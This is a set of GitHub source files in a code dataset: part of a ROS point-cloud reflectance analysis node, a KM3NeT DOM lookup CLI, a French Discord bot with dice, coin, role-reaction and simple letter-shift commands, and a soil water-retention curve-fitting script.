orientation_normalized[3]\n\n return marker, n_normalized, mid_point[2] #distance\n\n\n def residual(self, param, rA, thetaA, rB, thetaB):\n Ro = param[0]\n n = param[1]\n return (Ro*(np.cos((2-1/n)*thetaA))**n - rA) + (Ro*(np.cos((2-1/n)*thetaB))**n - rB)\n \n def residual_single(self, param, r, theta):\n Ro = param[0]\n n = param[1]\n return Ro*(np.cos((2-1/n)*theta))**n - r\n\n def runAlgoAndPublish(self, data):\n valid_takes = False\n\n if(self.takenA and self.takenB):\n valid_takes = True\n self.saveTakeInBag(self.data_directory)\n rospy.loginfo("Data complete, both takes saved in {0} as a ros bag\\n They will be used for the following calculation" .format(self.data_directory))\n\n else:\n rospy.logwarn("Data incomplete, default previously saved takes will be used")\n\n try:\n base_directory = "/home/introlab/Documents/git_rcm/rcm_poncage/pa_tof/launch"\n os.chdir(base_directory)\n bag_name = "default_takes.bag"\n bag = rosbag.Bag(bag_name)\n\n self.image_takeA = self.bridge.imgmsg_to_cv2(next(bag.read_messages(topics=["image_takeA"]))[1], desired_encoding='mono16')\n self.image_takeB = self.bridge.imgmsg_to_cv2(next(bag.read_messages(topics=["image_takeB"]))[1], desired_encoding='mono16')\n\n ros_msg_pc_takeA = next(bag.read_messages(topics=["pc_takeA"]))[1]\n ros_msg_pc_takeB = next(bag.read_messages(topics=["pc_takeB"]))[1]\n # Patch: https://github.com/eric-wieser/ros_numpy/issues/2\n 
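# messages read back from a bag are deserialized into a private message class\n # that ros_numpy will not numpify; re-tagging them as the registered\n # PointCloud2 type works around that (see the linked issue)\n 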
ros_msg_pc_takeA.__class__ = PointCloud2\n ros_msg_pc_takeB.__class__ = PointCloud2\n self.pc_takeA, self.dtype_takeA, self.header_takeA = self.rospc_to_nppc(ros_msg_pc_takeA) \n self.pc_takeB, self.dtype_takeB, self.header_takeB = self.rospc_to_nppc(ros_msg_pc_takeB)\n\n except Exception as e:\n bag.close()\n rospy.logerr(\"Something went wrong with the reading of the bag:\")\n rospy.logerr(e)\n else:\n bag.close()\n valid_takes = True\n rospy.loginfo(\"Default bag successfully read for both takes, algo is starting\")\n\n if valid_takes:\n t = Timer()\n\n # PREPROCESSING --------------------------------------------------------------------------------------------------------------\n t.start()\n # [R,G,B]\n color_takeA = [0,0,1]\n color_takeB = [1,0,1]\n\n # To validate algo with \"perfect\" data TODO\n synt_data = rospy.get_param(\"/sensor_used/synt_data\")\n if synt_data:\n rospy.logwarn(\"synthetic data parameter will be used\")\n dummy_pcA = np.zeros_like(self.pc_takeA)\n dummy_pcB = np.zeros_like(self.pc_takeB)\n\n dummy_pcA[..., 0] = np.tile(np.linspace(-0.4, 0.4, dummy_pcA.shape[1]), (dummy_pcA.shape[0],1))\n dummy_pcA[..., 1] = np.tile(np.linspace(0.25, -0.25, dummy_pcA.shape[0])[None,...].T, (1,dummy_pcA.shape[1]))\n dummy_pcA[..., 2] = 0.75\n\n print(\"Dummy_pcA shape and sample points:\")\n print(dummy_pcA.shape)\n print(dummy_pcA[0,0])\n print(dummy_pcA[100,100])\n print(dummy_pcA[-1,-1])\n\n dummy_pcB[..., 0] = np.tile(np.linspace(-0.5, 0.5, dummy_pcB.shape[1]), (dummy_pcB.shape[0],1))\n dummy_pcB[..., 2] = np.tile(np.linspace(1, 0.5, dummy_pcB.shape[1]), (dummy_pcB.shape[0],1))\n y_lim = np.linspace(0.4, 0.2, dummy_pcB.shape[1])\n for i, _ in enumerate(dummy_pcB[...,1].T):\n dummy_pcB[:,i,1] = np.linspace(y_lim[i], -y_lim[i], dummy_pcB.shape[0])\n\n print(\"Dummy_pcB shape and sample points:\")\n print(dummy_pcB.shape)\n print(dummy_pcB[0,0])\n print(dummy_pcB[100,100])\n print(dummy_pcB[-1,-1])\n\n self.pc_takeA = dummy_pcA\n self.pc_takeB = dummy_pcB\n\n # Cut the outer/biased part of the image (scaling)\n scaled_pcA_full = self.pc_takeA[self.border_size_y_takeA:self.img_dim_y-self.border_size_y_takeA, self.border_size_x_takeA:self.img_dim_x-self.border_size_x_takeA, :]\n scaled_pcB_full = self.pc_takeB[self.border_size_y_takeB:self.img_dim_y-self.border_size_y_takeB, self.border_size_x_takeB:self.img_dim_x-self.border_size_x_takeB, :]\n\n # Remove intensity\n scaled_pcA = scaled_pcA_full[..., :3] \n scaled_pcB = scaled_pcB_full[..., :3] \n\n rospy.loginfo(\"Preprocessing:\")\n t.stop()\n\n # ANGLE OF INCIDENCE -------------------------------------------------------------------------------------------------------- \n t.start()\n # Compute incidence angles\n thetaA, normal_marker_listA = self.incidence_angle(self.pc_takeA, scaled_pcA, self.border_size_x_takeA, self.border_size_y_takeA, color_takeA)\n thetaB_temp, normal_marker_listB = self.incidence_angle(self.pc_takeB, scaled_pcB, self.border_size_x_takeB, self.border_size_y_takeB, color_takeB)\n\n rospy.loginfo(\"Angle of incidence:\")\n t.stop()\n\n # WARPING --------------------------------------------------------------------------------------------------------------\n t.start()\n\n # Reference planes\n ref_camera_normal = np.array([0,0,1]) # Constant from normal point of view\n marker_Gplane_takeA, normal_Gplane_takeA, distance_Gplane_takeA = self.global_plane(scaled_pcA, color_takeA)\n marker_Gplane_takeB, normal_Gplane_takeB, distance_Gplane_takeB = self.global_plane(scaled_pcB, color_takeB)\n\n # Geometric 
relation\n Gplane_thetaA = np.arccos(ref_camera_normal@normal_Gplane_takeA)\n Gplane_thetaB = np.arccos(ref_camera_normal@normal_Gplane_takeB)\n # To be independent of the side of takeB\n if Gplane_thetaA < Gplane_thetaB:\n Gplane_delta_theta = Gplane_thetaA-Gplane_thetaB\n dir_x = -1\n else:\n Gplane_delta_theta = Gplane_thetaB-Gplane_thetaA\n dir_x = 1\n Gplane_quaternion = quaternion_from_euler(0,Gplane_delta_theta,0)\n\n Gplane_hypo = 2 * distance_Gplane_takeA * np.cos((np.pi/2)-(Gplane_delta_theta/2)) # distance_Gplane_takeA should = distance_Gplane_takeB\n\n # Transformation matrix -> TODO: get transformation from robot TFs\n t_msg = TransformStamped()\n t_msg.header.frame_id = \"angle_frame\"\n t_msg.header.stamp = rospy.Time.now()\n t_msg.child_frame_id = \"camera_frame\"\n t_msg.transform.translation.x = dir_x * Gplane_hypo * np.cos(Gplane_delta_theta/2)\n t_msg.transform.translation.y = 0.0\n t_msg.transform.translation.z = Gplane_hypo * np.sin(Gplane_delta_theta/2)\n t_msg.transform.rotation.x = Gplane_quaternion[0]\n t_msg.transform.rotation.y = Gplane_quaternion[1]\n t_msg.transform.rotation.z = Gplane_quaternion[2]\n t_msg.transform.rotation.w = Gplane_quaternion[3] \n\n transform_matrix = ros_numpy.numpify(t_msg.transform)\n\n # Warp pcB\n homo_axe = np.ones((scaled_pcB.shape[0], scaled_pcB.shape[1], 1))\n scaled_pcB_homo = np.concatenate((scaled_pcB,homo_axe), axis=2)\n scaled_pcB_warp = (scaled_pcB_homo@transform_matrix.T)[..., :-1] # Transform and remove homogeneous part\n scaled_pcB_warp_inprogress = np.concatenate((scaled_pcB_warp, scaled_pcB_full[...,3][...,None]), axis=2) # Add back intensity for display purpose\n\n # Instantiation (thetas were computed in the previous section)\n iA = scaled_pcA_full[..., 3]\n dA = scaled_pcA_full[..., 2]\n\n iB = np.zeros_like(scaled_pcA_full[..., 3])\n dB = np.zeros_like(scaled_pcA_full[..., 2])\n thetaB = np.zeros_like(thetaA)\n\n # KDtree\n nbr_interp = 3\n nbr_represent_optimal = int(np.sqrt(scaled_pcB_warp.shape[0]*scaled_pcB_warp.shape[1]))\n tree = KDTree(scaled_pcB_warp.reshape((-1,3), order='F'), leafsize=nbr_represent_optimal, copy_data=True) \n #ind = tree.query(scaled_pcA.reshape(-1, 3), k=1, return_distance=False) # If we want to remove the for loop\n\n # Apply warp to intensity, distance and angle of takeB\n for i, points_list in enumerate(tqdm(scaled_pcA, desc =\"Warping: \", leave=True)):\n for j, pointA in enumerate(points_list):\n # Euclidean distance, only with x and y\n #closest = np.unravel_index(np.argmin(np.sum(np.abs(scaled_pcB_warp[...,:-1] - pointA[:-1]), axis=2)), scaled_pcB_warp.shape[:-1]) # https://stackoverflow.com/questions/48135736/what-is-an-intuitive-explanation-of-np-unravel-index\n\n # KDtree, with x, y, z\n dd, ii = tree.query(pointA[None,...], k=nbr_interp, distance_upper_bound=0.1, workers=8) # distance_upper_bound max 10cm\n closest = np.unravel_index(ii, scaled_pcB_warp.shape[:-1], order='F')\n\n # from tuple to usable array\n closest_array = np.concatenate((closest[0], closest[1]), axis=0) \n\n # Interpolate\n nbr_neighbors_found = closest_array.shape[1]\n for l in range(nbr_neighbors_found):\n iB[i,j] = iB[i,j] + scaled_pcB_full[closest_array[0,l],closest_array[1,l],3]/nbr_neighbors_found\n dB[i,j] = dB[i,j] + scaled_pcB_full[closest_array[0,l],closest_array[1,l],2]/nbr_neighbors_found\n thetaB[i,j] = thetaB[i,j] + thetaB_temp[closest_array[0,l],closest_array[1,l]]/nbr_neighbors_found\n\n # Update x, y, z to fit with takeA and add intensity for display\n #scaled_pcB_warp[..., 0:2] = 
scaled_pcA[..., 0:2] # if only x, y\n scaled_pcB_warp_full = np.concatenate((scaled_pcA, iB[..., None]), axis=2)\n\n rospy.loginfo(\"Warping:\")\n t.stop()\n\n # ALGO PROPER -------------------------------------------------------------------------------------------------------- \n t.start()\n\n k = 10 # Radiometric scale factor [(R(spectralon)/R(mesure))/0.6]\n coeff = [8.94, 3.92, 1.79, 1.38, 4.44] # A, B, C, D, E from values in article\n fA = (coeff[0] + coeff[1]/dA**2) * (coeff[2]*thetaA**2 + coeff[3]*thetaA + coeff[4]) # arbitrary physical model from article\n fB = (coeff[0] + coeff[1]/dB**2) * (coeff[2]*thetaB**2 + coeff[3]*thetaB + coeff[4]) # arbitrary physical model from article\n if synt_data:\n synt_Ro = 0.85\n synt_n = 1.15\n rA = synt_Ro*np.power(np.cos((2-1/synt_n)*thetaA), synt_n)\n rB = synt_Ro*np.power(np.cos((2-1/synt_n)*thetaB), synt_n)\n else:\n rA = iA / (fA*k) # Absolute surface reflectance\n rB = iB / (fB*k) # Absolute surface reflectance\n\n # Define bounds for parameters\n bounds = ([0.5, 1.0], [1.5, 1.3])\n \n # Define least squares problem for each pixel in the image\n for i in tqdm(range(rA.shape[0]), desc =\"Least square adjustment: \", leave=True):\n for j in tqdm(range(rA.shape[1]), desc =\"current row: \", leave=False):\n\n # Define initial parameter guesses\n params = [self.Ro[i,j], self.n[i,j]]\n result = least_squares(self.residual, params, bounds=bounds, args=(rA[i,j], thetaA[i,j], rB[i,j], thetaB[i,j]), ftol=0.001, xtol=0.001, gtol=0.001, verbose=0)\n #result = least_squares(self.residual_single, params, bounds=bounds, args=(rB[i,j], thetaB[i,j]), xtol=0.001, verbose=0)\n \n # Extract estimated parameters\n self.Ro[i,j] = result.x[0]\n self.n[i,j] = result.x[1]\n if not result.success:\n print(\"pixel nbr:\", i, \",\", j, \"failed to converge\")\n\n # Print estimated parameters\n self.new_param = True\n \n '''# Estimate Ro and n from R_i and theta_i\n deltaC = np.ones_like(np.stack((thetaA,thetaB), axis=2))[..., :, None]\n deltaC_filtered = np.ones_like(deltaC)\n e = np.ones_like(deltaC)\n \n tolerance = 0.01\n while abs(np.mean(e)) > tolerance:\n print(\"Iteration start -----------------------------------------------------------------------------\")\n Ro = self.Ro\n n = self.n\n test = np.cos((2-1/n)*thetaA)\n print(\"cos -> \", \"min:\", np.amin(test), \"max:\", np.amax(test), \"mean:\", np.mean(test), \"std:\", np.std(test), \"var:\", np.var(test))\n print(\"Ro -> \", \"min:\", np.amin(Ro), \"max:\", np.amax(Ro), \"mean:\", np.mean(Ro), \"std:\", np.std(Ro), \"var:\", np.var(Ro))\n print(\"n -> \", \"min:\", np.amin(n), \"max:\", np.amax(n), \"mean:\", np.mean(n), \"std:\", np.std(n), \"var:\", np.var(n))\n dRA_dRo = np.power(np.cos((2-1/n)*thetaA), n)\n dRA_dn = Ro * np.power(np.cos((2-1/n)*thetaA), n) * (np.log(np.cos((2-1/n)*thetaA)) - np.tan(2-1/n)/n)\n dRB_dRo = np.power(np.cos((2-1/n)*thetaB), n)\n dRB_dn = Ro * np.power(np.cos((2-1/n)*thetaB), n) * (np.log(np.cos((2-1/n)*thetaB)) - np.tan(2-1/n)/n)\n a = np.transpose(np.array([[dRA_dRo, dRA_dn], [dRB_dRo, dRB_dn]]), (2,3,0,1))\n #a_T = np.transpose(a, (0,1,3,2))\n e = np.transpose(np.array([[rA - Ro*np.power(np.cos((2-1/n)*thetaA), n)], [rB - Ro*np.power(np.cos((2-1/n)*thetaB), n)]]), (2,3,0,1))\n print(\"A: \", a.shape)\n #print(\"A_T: \", a_T.shape)\n print(\"E: \", e.shape)\n print(\"deltaC: \", deltaC.shape)\n\n #deltaC = np.linalg.inv(a_T@a) @ a_T @ e # for non-square \"a\" matrix\n deltaC = np.linalg.inv(a) @ e\n print(\"E -> \", \"min:\", np.amin(e), \"max:\", np.amax(e), \"mean:\", 
np.mean(e), \"std:\", np.std(e), \"var:\", np.var(e))\n print(\"deltaC -> \", \"min:\", np.amin(deltaC), \"max:\", np.amax(deltaC), \"mean:\", np.mean(deltaC), \"std:\", np.std(deltaC), \"var:\", np.var(deltaC))\n\n learning_rate = 0.0001 #TODO: adjust\n deltaC_filtered = np.where(np.abs(e)>tolerance, deltaC, 0*deltaC)*learning_rate\n deltaC_simple_filtered = np.squeeze(deltaC_filtered, axis=-1)\n self.Ro = Ro + deltaC_simple_filtered[...,0]\n self.n = n + deltaC_simple_filtered[...,1]\n self.n = np.clip(self.n, a_min=0, a_max=None)\n self.new_param = True'''\n\n # Filter parameters to help generalize -> doesn't help...\n '''k = 7 # arbitrary values from article\n kernel_size = (k,k)\n self.Ro = cv2.blur(self.Ro, kernel_size, cv2.BORDER_REPLICATE)\n self.n = cv2.blur(self.n, kernel_size, cv2.BORDER_REPLICATE)\n self.new_param = True'''\n\n rospy.loginfo(\"Algo proper:\")\n t.stop()\n\n # IMAGE PROCESSING -------------------------------------------------------------------------------------------------------------\n t.start()\n\n # Identify the used part of the image\n self.image_algoA = cv2.rectangle(self.image_takeA, (self.border_size_x_takeA, self.border_size_y_takeA), (self.img_dim_x-self.border_size_x_takeA, self.img_dim_y-self.border_size_y_takeA), (0,0,255), 3) \n self.image_algoB = cv2.rectangle(self.image_takeB, (self.border_size_x_takeB, self.border_size_y_takeB), (self.img_dim_x-self.border_size_x_takeB, self.img_dim_y-self.border_size_y_takeB), (0,0,255), 3) \n\n # Display segmentation results\n #self.image_segmented = np.where((self.Ro>=9.5) & (self.n<1.25), 255, 0).astype(self.image_algoA.dtype)\n self.image_segmented = ((self.n - 1) * 65535).astype(self.image_algoA.dtype)\n\n rospy.loginfo(\"Image:\")\n t.stop()\n\n # TEXTOVERLAY ----------------------------------------------------------------------------------------------------------------\n thetaA_deg = np.rad2deg(thetaA)\n thetaB_deg = np.rad2deg(thetaB)\n self.overlay_msg.text = \"TakeA:\\n\"\n self.overlay_msg.text += \"General angle: {0}\\n\" .format(np.rad2deg(Gplane_thetaA))\n self.overlay_msg.text += \"Specific moy: {0}\\n\" .format(np.mean(thetaA_deg))\n self.overlay_msg.text += \"Specific deviation: {0}\\n\\n\" .format(np.std(thetaA_deg))\n self.overlay_msg.text += \"TakeB:\\n\"\n self.overlay_msg.text += \"General: {0}\\n\" .format(np.rad2deg(Gplane_thetaB))\n self.overlay_msg.text += \"Specific moy: {0}\\n\" .format(np.mean(thetaB_deg))\n self.overlay_msg.text += \"Specific deviation: {0}\\n\" .format(np.std(thetaB_deg))\n self.overlay_msg.text += \"debug---------\\n\"\n self.overlay_msg.text += \"General delta: {0}\\n\" .format(np.rad2deg(Gplane_delta_theta))\n\n self.overlay_msg.text += \"--------------------------------------\\n\"\n\n # PUBLISHER ------------------------------------------------------------------------------------------------------------------\n ros_msg_pc_takeA = self.nppc_to_rospc(scaled_pcA_full, self.dtype_takeA, self.header_takeA)\n ros_msg_pc_takeB = self.nppc_to_rospc(scaled_pcB_full, self.dtype_takeB, self.header_takeB)\n ros_msg_pc_takeB_inprogress = self.nppc_to_rospc(scaled_pcB_warp_inprogress, self.dtype_takeB, self.header_takeB)\n ros_msg_pc_takeB_warpped = self.nppc_to_rospc(scaled_pcB_warp_full, self.dtype_takeB, self.header_takeB)\n try:\n self.image_pub_textureA.publish(self.bridge.cv2_to_imgmsg(self.image_algoA, \"mono16\"))\n self.image_pub_textureB.publish(self.bridge.cv2_to_imgmsg(self.image_algoB, \"mono16\"))\n 
self.image_pub_segmented.publish(self.bridge.cv2_to_imgmsg(self.image_segmented, \"mono16\"))\n self.point_cloud_pub_takeA.publish(ros_msg_pc_takeA)\n self.point_cloud_pub_takeB.publish(ros_msg_pc_takeB)\n self.point_cloud_pub_takeB_inprogress.publish(ros_msg_pc_takeB_inprogress)\n self.point_cloud_pub_takeB_warpped.publish(ros_msg_pc_takeB_warpped)\n self.points_info.publish(self.overlay_msg)\n self.point_cloud_pub_normalA.publish(normal_marker_listA)\n self.point_cloud_pub_normalB.publish(normal_marker_listB)\n self.point_cloud_pub_planeA.publish(marker_Gplane_takeA)\n self.point_cloud_pub_planeB.publish(marker_Gplane_takeB)\n except CvBridgeError as e:\n print(e)\n \n\ndef main(args):\n rospy.init_node('image_converter')\n\n if rospy.get_param(\"/sensor_used/offline\"):\n rospy.logwarn(\"Offline mode, algo will only be usable with bag values\")\n else:\n # Expecting camera, wait and retry until the camera node is present\n while not(rospy.has_param(\"/helios_camera_node/intensity_width\")) or not(rospy.has_param(\"/helios_camera_node/intensity_height\")):\n rospy.logwarn(\"Camera node not created, algo node will not start yet...\")\n time.sleep(10)\n\n ic = image_converter()\n rospy.loginfo(\"Algo node up and running!\")\n\n # Calculate algo and publish results at fixed rate -> replaces: rospy.spin()\n r = rospy.Rate(ic.wanted_rate)\n\n # Display param graph\n plt.ion()\n animated_plot = plt.plot(ic.n.flatten(), ic.Ro.flatten(), marker='o', linestyle='none')[0]\n plt.title(\"Surface physical parameters\")\n plt.xlabel(\"n\")\n plt.ylabel(\"Ro\")\n plt.axis([1, 1.3, 0.5, 1.5])\n plt.draw()\n\n while not rospy.is_shutdown():\n r.sleep()\n\n if (ic.new_param):\n animated_plot.set_xdata(ic.n.flatten())\n animated_plot.set_ydata(ic.Ro.flatten())\n plt.draw()\n plt.pause(0.1)\n ic.new_param = False\n\n #ic.runAlgoAndPublish()\n \n # Save param and close plot\n np.save(os.path.join(ic.data_directory, \"param_Ro\"), ic.Ro)\n np.save(os.path.join(ic.data_directory, \"param_n\"), ic.n)\n\n rospy.loginfo(\"Both param arrays saved successfully in {0}\" .format(ic.data_directory))\n plt.close('all')\n\nif __name__ == '__main__':\n main(sys.argv)","repo_name":"Philippe-DAmours/personnal_RCM_Modulaire","sub_path":"pa_tof/src/texture_analysis.py","file_name":"texture_analysis.py","file_ext":"py","file_size_in_byte":34085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36982572777","text":"# Filename: wtd.py\n\"\"\"\nPrints information for a given DOM (and detector [O]ID)\n\nUsage:\n wtd DET_ID_OR_OID DOM_ID\n wtd (-h | --help)\n wtd --version\n\nOptions:\n DOM_ID The actual DOM ID.\n DET_ID_OR_OID Detector ID (like 29) or OID (like D_ARCA003).\n -h --help Show this screen.\n\n\"\"\"\n\nimport km3db\n\n__author__ = \"Tamas Gal\"\n__copyright__ = \"Copyright 2018, Tamas Gal and the KM3NeT collaboration.\"\n__credits__ = []\n__license__ = \"MIT\"\n__maintainer__ = \"Tamas Gal\"\n__email__ = \"tgal@km3net.de\"\n__status__ = \"Development\"\n\nlog = km3db.logger.log\n\n\ndef main():\n from docopt import docopt\n\n args = docopt(__doc__, version=km3db.version)\n\n dom_id = int(args[\"DOM_ID\"])\n det = args[\"DET_ID_OR_OID\"]\n\n try:\n dom = km3db.CLBMap(km3db.tools.todetoid(det)).dom_ids[dom_id]\n except (TypeError, KeyError):\n log.error(\"No DOM with ID '{}' found in detector '{}'\".format(dom_id, det))\n exit(1)\n else:\n for param, value in zip(dom._fields, dom):\n print(\"{}={}\".format(param, 
value))\n","repo_name":"tamasgal/km3db","sub_path":"km3db/cli/wtd.py","file_name":"wtd.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4848234","text":"# bot.py\n\nimport os\nimport random\nimport discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\n\ndescription = '''Bot Discord réalisé par Alexis.R.\\n Chaque commande doit être utilisée avec le préfixe \"!\" pour fonctionner.'''\n\nintents = discord.Intents.default()\nintents.reactions = True\nintents.members = True\nbot = commands.Bot(command_prefix='!', description=description, intents = intents)\n\n# Évènements \n\n@bot.event\nasync def on_ready():\n for guild in bot.guilds:\n print(f'Connexion réussie ! \\n{bot.user} est connecté sur le serveur {guild.name} (ID : {guild.id})\\n')\n\n channel = bot.get_channel(850484147965394964) # Affiche un message de confirmation dans le salon textuel \"générale\"\n await channel.send('Connexion au serveur réussie !')\n\n\n@bot.event\nasync def on_member_join(member):\n RoleNew = discord.utils.get(member.guild.roles, id=851796151362387968) # Identifiant du rôle Recrue\n await member.add_roles(RoleNew)\n\n for guild in bot.guilds:\n channel = bot.get_channel(843196170620633140) # Affiche un message de confirmation dans le salon textuel \"général\"\n await channel.send(f'**Bienvenue à _{member.name}_ sur le serveur :tools: {guild.name}** !')\n\n@bot.event\nasync def on_raw_reaction_add(payload):\n msgID = 853775690112565270\n\n if msgID == payload.message_id:\n member = payload.member\n guild = member.guild\n\n emoji = payload.emoji.name\n if emoji =='⚔️':\n role = discord.utils.get(guild.roles, name=\"Chevalier\")\n elif emoji =='🛡️':\n role = discord.utils.get(guild.roles, name=\"Paladin\")\n elif emoji =='🎯':\n role = discord.utils.get(guild.roles, name=\"Archer\")\n elif emoji =='🗡️':\n role = discord.utils.get(guild.roles, name=\"Assassin\")\n await payload.member.add_roles(role)\n\n@bot.event\nasync def on_raw_reaction_remove(payload):\n msgID = 853775690112565270\n\n if msgID == payload.message_id:\n guild = await(bot.fetch_guild(payload.guild_id))\n emoji = payload.emoji.name\n if emoji =='⚔️':\n role = discord.utils.get(guild.roles, name=\"Chevalier\")\n elif emoji =='🛡️':\n role = discord.utils.get(guild.roles, name=\"Paladin\")\n elif emoji =='🎯':\n role = discord.utils.get(guild.roles, name=\"Archer\")\n elif emoji =='🗡️':\n role = discord.utils.get(guild.roles, name=\"Assassin\")\n member = await(guild.fetch_member(payload.user_id))\n if member is not None:\n await member.remove_roles(role)\n\n# Commandes utilisées sur le serveur et interprétées par le bot\n\n@bot.command(name='ping', help='| Envoie un ping au bot')\nasync def ping(ctx):\n await ctx.send(f'Pong ! 
{round (bot.latency * 1000)}ms')\n\ndetermine_flip = [1, 0]\n@bot.command(name='coin', help='| Simule un lancer de pièce et affiche le résultat.')\nasync def coin(ctx):\n if random.choice(determine_flip) == 1:\n embed = discord.Embed(\n title=\":coin: Pile ou face \", \n description=f\"{ctx.author.mention} a lancé une pièce et a obtenu **Pile** !\")\n await ctx.send(embed=embed)\n \n else:\n embed = discord.Embed(\n title=\":coin: Pile ou face \", \n description=f\"{ctx.author.mention} a lancé une pièce et a obtenu **Face** !\")\n await ctx.send(embed=embed)\n\n@bot.command(name='dice', help='| Simule un ou plusieurs lancers de dés')\nasync def dice(ctx, number_of_dice: int, number_of_sides: int):\n dice = [\n str(random.choice(range(1, number_of_sides + 1)))\n for _ in range(number_of_dice)\n ]\n embed = discord.Embed(\n title=\":game_die: Lancer de dés\", \n description=f\"{ctx.author.mention} a lancé les dés et a obtenu :\\n**{dice}**\")\n await ctx.send(embed=embed)\n\n@bot.command(pass_context=True)\nasync def role(ctx):\n embed = discord.Embed(\n title = \"Réagissez avec un emoji pour ajouter un rôle.\",\n description = f\":crossed_swords: Chevalier \\n :shield: Paladin \\n :dart: Archer \\n :dagger: Assassin\"\n )\n msg = await ctx.send(embed=embed)\n await msg.add_reaction('⚔️') #Chevalier\n await msg.add_reaction('🛡️') #Paladin\n await msg.add_reaction('🎯') #Archer\n await msg.add_reaction('🗡️') #Assassin\n\n@bot.command(name='encrypt', help='| Encrypte et décrypte un message ou un mot de passe')\n\nasync def encrypt(ctx):\n tableauSaisie=[]\n tableauLettre=[]\n tableauCrypto=[]\n toto=[]\n titi=[]\n tata=[]\n tab=[]\n\n def saisieTableauLettre(tab):\n \"\"\"initialisation tableau lettre\"\"\"\n for i in range (65,91):\n z=chr(i)\n tab.append(z)\n return tab\n\n #Creation du tableau de reference\n saisieTableauLettre(tableauLettre)\n\n def saisieTableauCrypto(tableauCrypto):\n \"\"\"initialisation tableau lettre crypto\"\"\"\n for i in range (66,91):\n c=chr(i)\n tableauCrypto.append(c)\n tableauCrypto.insert(25,\"A\") \n return tableauCrypto \n\n #Creation du tableau crypte\n saisieTableauCrypto(tableauCrypto)\n\n def saisieTableauSaisie(tab):\n \"\"\"saisie du tableau de depart \"\"\"\n for i in range (taille):\n x=str(input(\"Saisir la lettre à ajouter dans le tableau : \"))\n tab.append(x)\n return tab\n\n def Crypt(tab):\n \"\"\"changement de lettre Cryptage\"\"\"\n for i in range(0, taille):\n for j in range(0, 26):\n if tableauSaisie[i] == tableauLettre[j]:\n l=tableauCrypto[j]\n tab.append(l)\n j = 26\n return tab\n \n def Decrypt(tab):\n \"\"\"changement de lettre Decryptage \"\"\"\n for i in range(0, taille):\n for j in range(0, 26):\n if toto[i] == tableauCrypto[j]:\n m=tableauLettre[j]\n tab.append(m)\n j = 26\n return tab\n \n def Decrypt2(tab):\n \"\"\"changement de lettre Decryptage \"\"\"\n for i in range(0, taille):\n for j in range(0, 26):\n if tableauSaisie[i] == tableauCrypto[j]:\n m=tableauLettre[j]\n tab.append(m)\n j = 26\n return tab\n #affichage final\n\n #programme principal\n\n #nombre de lettre du mot à saisir\n await ctx.send(f'Entrez le nombre de lettres à saisir')\n taille = await bot.wait_for('message')\n #Mise en memoire du tableau saisie\n tableauSaisie = saisieTableauSaisie(tableauSaisie)\n\n Crypt=Crypt(toto)\n\n rep=str(input(\"veuillez saisir votre choix \\n C pour Crypter \\n D pour decrypter la saisie crypter \\n DD pour decrypter seulement \\n\"))\n\n if (rep=='C'):\n print(\"le message \",tableauSaisie, \"saisie devient crypté en 
\",Crypt)\n elif (rep=='D'):\n print(\"le message encrypté de \", Crypt, \"donne \",Decrypt(titi))\n else :\n print(\"le message \",tableauSaisie, \"saisie devient décrypté en \",Decrypt2(tata))\n\n\nbot.run(TOKEN)","repo_name":"AlexisRqs/Alex6Bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7200,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18779668271","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 15 10:40:52 2022\n\n@author: natan\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport statsmodels.api as sm\nimport scipy.optimize\n#%%\nfig_size = plt.rcParams[\"figure.figsize\"]\nfig_size[0] = 14\nfig_size[1] = 7\n\nplt.rcParams['font.size']=28\n#%%\nalldata = pd.read_csv('moflux_land_data_newLAI.csv')\npsi = np.array(alldata[\"LWP_predawn\"])\nsmc = np.array(alldata[\"SMC\"])\nno_data = np.isnan(psi)\nsmc = smc[np.logical_not(no_data)]\npsi = psi[np.logical_not(no_data)]\nyears = np.array(alldata[\"YEAR\"])[np.logical_not(no_data)]\n#%%\nyearlist = np.unique(years)\n#%%\nti = yearlist[7]\nx = smc[years==ti]\ny = psi[years==ti]\nxR = (x-0.067)/(0.55-0.067)\n#%%\ndef pot_err(params):\n s0, s1, n, alpha = params\n relsoil = np.clip((x-s0)/(s1-s0),0.01,0.99)\n m = 1 - 1/n\n predpot = -1/alpha * (relsoil ** (-1/m) - 1) ** (1/n)\n return np.mean(np.abs(predpot - y))\n#%%\nmyopt = scipy.optimize.minimize(pot_err,np.array([0.05,0.55,1.2,100]),\n bounds = ((0,0.1),(0.4,0.6),(1.05,2),(1,1000)))\n#%%\ns0, s1, n, alpha = myopt.x\n#relsoil = np.clip((x-s0)/(s1above),0.01,0.99)\nm = 1 - 1/n\n#predpot = -1/alpha * (relsoil ** (-1/m) - 1) ** (1/n)\n#%%\nsrange = np.arange(np.min(x)-0.01,np.max(x),0.005)\nrelsoil = np.clip((srange-s0)/(s1-s0),0.01,0.99)\nm = 1 - 1/n\npredpot = -1/alpha * (relsoil ** (-1/m) - 1) ** (1/n)\n\n#%%\nplt.plot(x,y,\"o\")\nplt.plot(srange,predpot)\n#%%\ndef pot_err(params):\n n, alpha = params\n m = 1 - 1/n\n predpot = -1/alpha * (xR ** (-1/m) - 1) ** (1/n)\n return np.mean(np.abs(predpot - y))\n#%%\nmyopt = scipy.optimize.minimize(pot_err,np.array([1.3,25]),\n bounds = ((1.05,2),(1,1000)))\nn, alpha = myopt.x\nm = 1 - 1/n\nsrange = np.arange(np.min(x)-0.01,np.max(x)+0.01,0.005)\nrelsoil = np.clip((srange-0.067)/(0.55-0.067),0.01,0.99)\npredpot = -1/alpha * (relsoil ** (-1/m) - 1) ** (1/n)\n#%%\nnlist = np.arange(1.1,2,0.01)\n\nbestpar = []\n\nfor ti in range(len(yearlist)):\n x = smc[years==yearlist[ti]]\n y = psi[years==yearlist[ti]]\n xR = np.clip((x-0.067)/(0.55-0.067),0.01,0.99)\n \n corlist = []\n for n in nlist:\n m = 1 - 1/n\n predpot_base = -(xR ** (-1/m) - 1) ** 